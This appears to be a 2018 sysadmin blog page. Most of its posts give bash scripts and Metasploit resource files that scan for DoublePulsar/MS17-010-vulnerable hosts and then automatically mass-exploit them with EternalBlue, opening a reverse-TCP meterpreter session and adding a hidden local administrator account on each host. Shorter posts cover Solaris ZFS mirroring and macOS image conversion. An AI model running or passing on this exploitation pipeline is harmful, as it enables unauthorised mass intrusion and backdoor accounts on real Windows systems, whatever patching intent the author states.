<find vuln hosts>
#!/bin/bash
VULNHOSTS=/root/doublepulsar.scan/VULNHOSTS
TIMESTAMP=$(date "+%Y%m%d")
cd /root/doublepulsar.scan/VULNHOSTS/
msfconsole -x "color false ; vulns -o /root/doublepulsar.scan/VULNHOSTS/vulns.msf ; exit"
sort -u $VULNHOSTS/vulns.msf > $VULNHOSTS/vulns.msf.o
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $VULNHOSTS/vulns.msf.o > $VULNHOSTS/vulns.msf.ip
sort -u $VULNHOSTS/vulns.msf.ip > $VULNHOSTS/vulnerablehosts.$TIMESTAMP
for file in $(find . -mtime 1 ); do
sdiff $file vulnerablehosts.$TIMESTAMP | less | grep '>' > changes.$TIMESTAMP
done
mail -s "vulnerable hosts $TIMESTAMP" me@hell < vulnerablehosts.$TIMESTAMP
mail -s "vulnerable hosts difference $TIMESTAMP" me@hell < changes.$TIMESTAMP
#rm -rf $VULNHOSTS/vulns.*
#rm $VULNHOSTS/changes.$TIMESTAMP
<post report, exploit>
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
THEWICKED=/root/doublepulsar.scan/VULNHOSTS
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
TOMORROW=$(date -d "next day" '+%Y%m%d')
WORK=/root/.msf4
cd $PROCESS/
mkdir $PROCESS/logs/$TODAY
cp $WORK/thewicked $WORK/thewicked.$TODAY
cp $THEWICKED/vulnerablehosts.$TODAY $WORK/thewicked
#hack em
cd /root/.msf4
msfconsole -x "color false ; jobs -K ; resource doublepulsar-loop.rc ; exit"
cd /root/.msf4/logs/sessions
ls | grep $TODAY | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mkdir /root/doublepulsar.scan/exploit/$TODAY
mv /root/.msf4/logs/sessions/*.log $PROCESS/$TODAY
mail -s "doublepulsar vuln hosts exploited $TODAY" me@hell < $PROCESS/exploited.$TODAY
exit
Tuesday, October 30, 2018
automate ms010-17 exploitation better
Wednesday, September 26, 2018
automate exploiting newly-found doublepulsar vulnerable hosts
i've written about how to automate discovery. let's go to the next level and automate
reporting on and exploiting newly-discovered doublepulsar vulnerable hosts.
this would assume you have a previously created list of vulnerable host which
we're diffing off-of.
this would assume you have a previously created list of vulnerable host which
we're diffing off-of.
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
cd $PROCESS/
#dump vulns
msfconsole -x "color false ; vulns -o $PROCESS/vulndetect.$TODAY ; exit"
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $PROCESS/vulndetect.$TODAY \
> $PROCESS/vulnparsed.$TODAY
diff -u $PROCESS/vuln.$YESTERDAY $PROCESS/vulnparsed.$TODAY | grep + | grep + |grep -v @ \
|grep -v +++ |sed 's/+//g' > $PROCESS/vuln.$TODAY
msfconsole -x "color false ; spool $PROCESS/output.$TODAY ; use auxiliary/scanner/smb/smb_version;
set RHOSTS file:$PROCESS/vuln.$TODAY ; set thread 100; run; exit"
echo $DATE > $PROCESS/mail.$TODAY
cat $PROCESS/vuln.$TODAY $PROCESS/output.$TODAY >> $PROCESS/mail.$TODAY
mail -s "new doublepulsar vuln hosts $TODAY " me@in.hell < $PROCESS/mail.$TODAY
rm $PROCESS/vulnparsed.*
rm $PROCESS/vulndetect.*
rm $PROCESS/mail.$TODAY
cp $PROCESS/vuln.$TODAY /root/.msf4/thewicked
#hack em
kill -9 `ps -ef|grep msfconsole| awk '{print $2}'`
msfconsole -r "/root/.msf4/doublepulsar-loop.rc ; exit"
ls /root/.msf4/logs/sessions | grep $TODAY \
|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mail -s "new doublepulsar vuln hosts exploited $TODAY " me@in.hell < $PROCESS/exploited.$TODAY
rm $PROCESS/exploited.$TODAY
exit
Monday, September 24, 2018
no raid-1? try zfs-mirror in sol11. but wait...
i installed solaris 11.14 on a decade-old system. i was really happy it installed. and then i remembered:
i was not given the option to mirror anything. it just installed and i clicked f2 f2 f2.
i want to set up something like raid-1. this is solaris, so i can do zfs mirroring. good enough. oh, i did an install over an old system, so yeah, there's that.
what i ended up doing was grabbing the partition table from the first (zfs-pool holding) disk and over-wrote that of the second disk since my re-label command was ignored. after that, i created my mirror pool and all was well with the world.
zpool status rpool
pool: rpool
state: ONLINE
scan: none requested
config:
NAME STATE READ WRITE CKSUM
rpool ONLINE 0 0 0
c0t5000CCA022532534d0s0 ONLINE 0 0 0
errors: No known data errors
only disk in rpool: c0t5000CCA022532534d0s0
[root@blackhole ~]# format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
0. c0t5000CCA022532534d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022532534
/dev/chassis/SYS/HDD0/disk
1. c0t5000CCA022543154d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022543154
/dev/chassis/SYS/HDD1/disk
1 is the second disk
1. verify it has Part 0 . It does!
[root@blackhole ~]# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
vdev verification failed: use -f to override the following errors:
/dev/dsk/c0t5000CCA022543154d0s0 contains a ufs filesystem.
Unable to build pool from specified devices: device already in use
Nope.
format -e
<select 1>
format > p [Parition editor]
format > label
Specify Label type[0]: 0
Ready to label disk, continue? y
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
cannot attach c0t5000CCA022543154d0s0 to c0t5000CCA022532534d0s0: device is too small
Still nope.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0
* /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 585912500 585912499
2 5 01 0 585912500 585912499
okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 262500 262499
1 3 01 262500 262500 524999
2 5 01 0 585912500 585912499
6 4 00 525000 585387500 585912499
NOT okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0 > /tmp/dsk0-part.dump
root@blackhole:~# fmthard -s /tmp/dsk0-part.dump /dev/rdsk/c0t5000CCA022543154d0s0
fmthard: New volume table of contents now in place.
Verify the VTOC on c0t5000CCA022543154d0s0. We're going to do something wicked.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 585912500 585912499
2 5 01 0 585912500 585912499
This is okay.
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
Make sure to wait until resilver is done before rebooting.
This is much better.
root@blackhole:~# zpool status rpool
pool: rpool
state: ONLINE
scan: resilvered 21.9G in 2m52s with 0 errors on Mon Sep 24 15:39:51 2018
config:
NAME STATE READ WRITE CKSUM
rpool ONLINE 0 0 0
mirror-0 ONLINE 0 0 0
c0t5000CCA022532534d0s0 ONLINE 0 0 0
c0t5000CCA022543154d0s0 ONLINE 0 0 0
errors: No known data errors
This is much much better.
root@blackhole:~# zpool list rpool
NAME SIZE ALLOC FREE CAP DEDUP HEALTH ALTROOT
rpool 278G 38.2G 240G 13% 1.00x ONLINE -
We are golden!
Saturday, September 22, 2018
macos split all the jpgs in a directory in half
find . -name "*.jpg" | while read $i; do convert $i -crop 50%x100% +repage $i; done
a play on:
convert input.png -crop 50%x100% +repage input.png
Monday, September 17, 2018
macos terminal convert pdf to jpg
find . -name "*.pdf" | while read filename; do fileconvert=`echo "$filename" \ | sed "s/pdf/jpg/g"` ; sips -s format jpeg "$filename" --out "$fileconvert"; done
Thursday, August 16, 2018
remotely exploit a number of hosts with metasploit via eternalblue
in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
## msfconsole
msf > vulns -R
… a lot of text … look at end of output for a file dropped in /tmp e.g. ...
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k
msf > exit
# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
Once all as completed, look through ~/.msf4/logs/doublepuslar.log for adminuser
as those hosts have had the local admin user for your evil created.
## files
[doublepulsar-loop.rc]
<ruby>
# the rhosts from vuln_db
hostsfile="/root/.msf4/thewicked"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")
# the rhosts loop
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit")
run_single("sleep 2s")
end
</ruby>
[doublepulsar.rc]
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
[doublepulsar-lsadmin]
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
Monday, August 13, 2018
one-off doublepulsar scan script because sometimes people need to do one thing and one thing only
so yeah.
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")
read -p "Enter IP to evaluate: " IP
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
read -p "Enter email address (or not): " EMAIL
else echo "Not a valid IP" && exit 0
fi
rm -rf /tmp/$IP
mkdir /tmp/$IP
cd /tmp/$IP
#msfconsole
sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"
sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > /tmp/$IP/output.msf.1
sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN
sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED
clear
if [ -s /tmp/$IP/output.msf.INFECTED ]
then
echo " Uh oh $IP DoublePulsar infected"
mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED
mail -s " $IP DoublePulsar intected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1
else
echo " Phew $IP not infected "
fi
if [ -s /tmp/$IP/output.msf.VULN ]
then
echo " Sigh $IP DoublePulsar vulnerable "
mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1
else
echo " Double Phew $IP not DoublePulsar vulnerable"
fi
cd /tmp
rm -rf /tmp/$IP
exit 0
Subscribe to:
Posts (Atom)